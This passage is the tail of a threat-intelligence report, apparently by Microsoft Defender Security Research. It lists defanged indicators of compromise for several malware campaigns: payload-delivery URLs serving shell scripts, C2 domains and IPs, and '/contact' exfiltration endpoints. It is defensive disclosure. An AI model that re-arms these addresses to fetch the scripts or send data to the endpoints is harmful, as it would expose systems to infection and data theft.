hxxp://paralegalmustang[.]icu/script[.]sh
URL
Payload delivery
hxxps://round5on[.]digital/script[.]sh
URL
Payload delivery
hxxps://qjywvkbl[.]degassing-mould[.]digital
URL
Payload delivery
hxxps://zg5mkr7q[.]apexharvestor[.]digital
URL
Payload delivery
hxxps://kvrnjr30[.]apexharvestor[.]digital
URL
Payload delivery
hxxps://yygp4pdh[.]apexharvestor[.]digital
URL
Payload delivery
hxxps://t[.]me/ax03bot
URL
Payload delivery
0x666[.]info
Domain
Payload delivery, C2, and exfiltration
honestly[.]ink
Domain
Payload delivery, C2, and exfiltration
95.85.251[.]177
IP address
Payload delivery, C2, and exfiltration
pla7ina[.]cfd
Domain
Payload delivery, C2, and exfiltration
play67[.]cc
Domain
Payload delivery, C2, and exfiltration
Helper campaign
Indicator
Type
Description
rvdownloads[.]com
Domain
Payload delivery
famiode[.]com
Domain
Payload delivery
contatoplus[.]com
Domain
Payload delivery
woupp[.]com
Domain
Payload delivery
saramoftah[.]com
Domain
Payload delivery
ptrei[.]com
Domain
Payload delivery
wriconsult[.]com
Domain
Payload delivery
kayeart[.]com
Domain
Payload delivery
ejecen[.]com
Domain
Payload delivery
stinarosen[.]com
Domain
Payload delivery
biopranica[.]com
Domain
Payload delivery
raxelpak[.]com
Domain
Payload delivery
octopox[.]com
Domain
Payload delivery
boosterjuices[.]com
Domain
Payload delivery
ftduk[.]com
Domain
Payload delivery
dryvecar[.]com
Domain
Payload delivery
vcopp[.]com
Domain
Payload delivery
kcbps[.]com
Domain
Payload delivery
jpbassin[.]com
Domain
Payload delivery
isgilan[.]com
Domain
Payload delivery
arkypc[.]com
Domain
Payload delivery
hacelu[.]com
Domain
Payload delivery
stclegion[.]com
Domain
Payload delivery
xeebii[.]com
Domain
Payload delivery
hxxp://138.124.93[.]32/contact
URL
Exfiltration endpoint
hxxp://168.100.9[.]122/contact
URL
Exfiltration endpoint
hxxp://199.217.98[.]33/contact
URL
Exfiltration endpoint
hxxp://38.244.158[.]103/contact
URL
Exfiltration endpoint
hxxp://38.244.158[.]56/contact
URL
Exfiltration endpoint
hxxp://92.246.136[.]14/contact
URL
Exfiltration endpoint
hxxps://avipstudios[.]com/contact
URL
Exfiltration endpoint
hxxps://joytion[.]com/contact
URL
Exfiltration endpoint
hxxps://laislivon[.]com/contact
URL
Exfiltration endpoint
hxxps://mpasvw[.]com/contact
URL
Exfiltration endpoint
hxxps[://]lakhov[.]com/contact
URL
Exfiltration endpoint
Update campaign infrastructure
Indicator
Type
Description
reachnv[.]com
Domain
Delivery of the update install variant of the helper campaign
vagturk[.]com
Domain
Delivery of the update install variant of the helper campaign
futampako[.]com
Domain
Delivery of the update install variant of the helper campaign
octopox[.]com
Domain
Delivery of the update install variant of the helper campaign
lbarticle[.]com
Domain
Delivery of the update install variant of the helper campaign
raytherrien[.]com
Domain
Delivery of the update install variant of the helper campaign
joeyapple[.]com
Domain
Delivery of the update install variant of the helper campaign
This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and members of Microsoft Threat Intelligence.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.